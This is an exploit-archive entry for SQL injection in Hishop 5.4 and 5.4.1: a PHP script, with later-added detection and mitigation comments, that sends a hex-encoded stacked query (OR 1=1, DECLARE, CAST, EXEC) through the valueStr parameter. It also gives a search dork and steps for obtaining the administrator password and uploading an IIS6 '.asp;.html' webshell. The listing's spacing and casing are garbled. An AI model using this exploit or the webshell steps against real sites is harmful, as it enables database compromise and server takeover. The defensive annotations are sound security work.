Hishop 5.4 & 5.4.1 SQL injection



EKU-ID: 1871 CVE: OSVDB-ID:
Author: Hacker-Fire Published: 2012-04-09 Verified: Verified


##################################################
# Exploit Title: [Hishop 5.4 & 5.4.1 SQL injection]
# Date: [06-04-2012]
# Author: [Hacker-Fire]
# Vendor or Software Link: [http://www.hishop.com.cn/bbs/thread-htm-fid-13.html]
# Version: [ 5.4 & 5.4.1 ]
# Category:: [ webapps]
# Google dork: [intext:Hishop 5.4]
# Tested on: [Windows 7 ]
##################################################

[~] P0c [~] :

<? Php
// Start of the proof-of-concept for the SQL injection named in the header
// (Hishop 5.4 and 5.4.1). NOTE(review): spacing and letter case in this
// listing appear to have been altered in publication; the code is kept
// exactly as posted.
// This part only prints a banner.
print_r ('
+ ------------------------- +
Hishop 5.4 & 5.4.1 SQL injection the exploit By: Hacker-Fire
+ ------------------------- +
');
// With fewer than three command-line arguments, print the usage text and
// exit. The usage text names the arguments as Host, Port, Path and RegMail.
// The example path shows the affected request shape: a category .aspx page
// with a valueStr query parameter. Defenders can use that shape when
// searching web-server logs for probing of this parameter.
if ($ argc <3) {
print_r ('
+ ------------------------- +
Usage: php '. $ Argv [0].' Host Port Path RegMail
Example:
php '. $ argv [0].' localhost 80 / SHOES/category-92.aspx? valueStr = 35_0 ​​syc@myclover.org
+ ------------------------- +
');
exit;
}
// Read the four command-line values: target host, port, request path and
// an e-mail address.
$ Host = $ argv [1];
$ Port = $ argv [2];
$ Path = $ argv [3];
$ Mail = $ argv [4];
// Hex-encode the e-mail address one character at a time, appending 00 after
// each character code (the byte layout of UTF-16LE text for ASCII input),
// then upper-case the result.
$ Expdata = "";
for ($ i = 0; $ i <strlen ($ mail); $ i + +)
$ Expdata = $ expdata. Dechex (ord ($ mail [$ i])). "00";
$ Expdata = strtoupper ($ expdata);
// Build the suffix that is appended to the request path. Read as URL-encoded
// text it is: a quote and closing parenthesis (%27 and a parenthesis), an
// always-true OR condition, then a stacked batch that DECLAREs an NVARCHAR
// variable, SETs it from CAST(hex AS NVARCHAR) and passes it to EXEC,
// followed by a SQL comment marker. Presumably the hex form is used so the
// executed text does not appear in clear in the URL.
// NOTE(review): which statement the server would finally run cannot be
// determined from this listing alone.
// Detection: flag query strings containing DECLARE, CAST( ... AS NVARCHAR or
// EXEC( , especially next to long hex runs, in web-server and WAF logs.
// Mitigation: pass valueStr to the database as a bound parameter instead of
// concatenating it into SQL, validate it against its expected format, and
// run the application under a least-privilege database login.
$ Expdata = "% 27)% 20or% 201 = 1; DECLARE% 20 @ S% 20NVARCHAR (4000)% 20SET% 20 @ S = CAST (". $ Expdata. "2700% 20AS% 20NVARCHAR (4000))% 20EXEC (S); - ";
// Send one request carrying the suffix; GET is defined below in this listing.
GET ($ host, $ port, $ path, $ expdata, 30);

// GET: sends a single HTTP request and discards the reply.
// Parameters: host, port, path, data, timeout and an optional cookie. The
// body does not reference the timeout or cookie parameters; the connect
// timeout passed to fsockopen is the literal 30.
// Behaviour: opens a TCP connection with fsockopen; on failure echoes the
// error text and number and exits. Otherwise it writes an HTTP/1.1 GET
// request whose request line is the path followed by the data, plus Host and
// Connection headers, then reads the response with fgets (length argument
// 128) until end of stream without inspecting it, and closes the socket.
// Because nothing from the response is examined, the script itself gives no
// indication of whether the request had any effect.
// For defenders: the injected text travels in the URL of a GET request, so
// it is recorded in ordinary access logs (the cs-uri-query field in IIS W3C
// logs) and can be matched there.
function GET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ") {
$ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, 30);
if (! $ fp) {
echo "{$ the errstr} ({$ errno is}) <br /> \ n";
exit;
}

$ Out = "GET $ path $ data HTTP/1.1 \ r \ n";
$ Out. = "The Host: $ host: $ port \ r \ n";
$ Out. = "The Connection: CLOSE \ r \ n \ r \ n \ r \ n";

fwrite ($ fp, $ out);
while (! feof ($ fp)) {
fgets ($ fp, 128);
}
fclose ($ fp);
}

// Prints the follow-up steps the author describes; this statement only
// writes text and sends nothing to the target.
// The first list appears to rely on the account e-mail and password
// e-mailing features of the shop. The second list relies on an administrator
// being able to upload a category template whose name contains .asp; before
// a final .html extension. IIS 6 stops parsing such a name at the semicolon
// when choosing a script handler, so the file is executed as ASP even though
// it ends in .html.
// Mitigation: validate upload names against an allow-list of extensions and
// reject semicolons, disable script execution for theme and upload
// directories, restrict who can reach the admin template functions, and
// move off IIS 6.
// Detection: look for files with .asp; in their names under the Themes
// directory tree and for requests to such paths in access logs.
print_r ('
+ ------------------------- +
[+] Get Manager, the Password
[1] to [landing] - "[My Account] -" [personal information】
[2] E-mail the administrator password.
[3] the Good Luck!
+ ------------------------- +
[+] Get the WebShell (the IIS6)
Log in from [1] / admin / [commodity management] - "[Category template set】
[2] the upload 1.asp;. Html
[3] the Shell Address: http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;. Html
+ ------------------------- +
');
?>
##########################################################
[»] Greetz to :
                    
[ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ]
[ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]            
[ And all my Freinds + Algerian Hackers ]
      
##########################################################